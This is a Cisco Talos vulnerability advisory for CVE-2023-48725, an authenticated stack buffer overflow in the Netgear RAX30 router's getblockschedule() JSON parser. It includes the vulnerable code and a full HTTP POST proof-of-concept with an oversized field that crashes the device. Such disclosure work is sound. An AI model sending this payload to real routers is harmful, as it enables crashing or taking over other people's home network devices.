Talos Vulnerability Report

TALOS-2023-1887

Netgear RAX30 JSON Parsing getblockschedule() stack-based buffer overflow vulnerability

March 7, 2024
CVE Number

CVE-2023-48725

SUMMARY

A stack-based buffer overflow vulnerability exists in the JSON Parsing getblockschedule() functionality of Netgear RAX30 1.0.11.96 and 1.0.7.78. A specially crafted HTTP request can lead to code execution. An attacker can make an authenticated HTTP request to trigger this vulnerability.

CONFIRMED VULNERABLE VERSIONS

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

Netgear RAX30 1.0.11.96
Netgear RAX30 1.0.7.78

PRODUCT URLS

RAX30 - https://www.netgear.com/support/product/rax30

CVSSv3 SCORE

7.2 - CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

CWE

CWE-121 - Stack-based Buffer Overflow

DETAILS

AX2400 WiFi Router (RAX30) is a home router created by Netgear.

There exists a vulnerability in the getblockschedule function. This is called from a function lookup table inside of the main function of the binary.

int32_t getblockschedule(struct json_object* json_obj)
{
    ...
    char s_3[0x100];
    if (json_object_object_get_ex(json_obj, "message", &message_output) == 0)
    {
        cmsUtl_strcpy(&s_3, json_object_get_string(json_obj)); // unbounded strcpy to static size buffer.
    }
...
}

This was triggered on a live device with the following payload:

POST /cgi-bin/rex_cgi?csrftoken=2053576656 HTTP/1.1
Host: 192.168.1.1
Content-Length: 999
Authorization: Basic YWRtaW46R00kY3ByMjdhYQ==
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36
Content-Type: application/json; charset=UTF-8
Origin: http://192.168.1.1
Referer: http://192.168.1.1/DEV_name.html
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: session=Xa7mGpxoQNBlU9YObP5Yhga9HGgtDQIY
Connection: close

{"function":"getblockschedule","data":{"notamesg":"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"}}

This request creates a crash of the client application due to a strcpy on an unchecked length into a stack-based buffer. This will occur whenever there is no message object inside of the data payload of the getblockschedule. This is entirely user controlled data.

VENDOR RESPONSE

Vendor advisory: https://kb.netgear.com/000066037/Security-Advisory-for-Post-Authentication-Stack-Overflow-on-the-RAX30-PSV-2023-0160

TIMELINE

2023-12-06 - Vendor Disclosure
2024-03-06 - Vendor Patch Release
2024-03-07 - Public Release

Credit

Discovered by Michael Gentile of Cisco Talos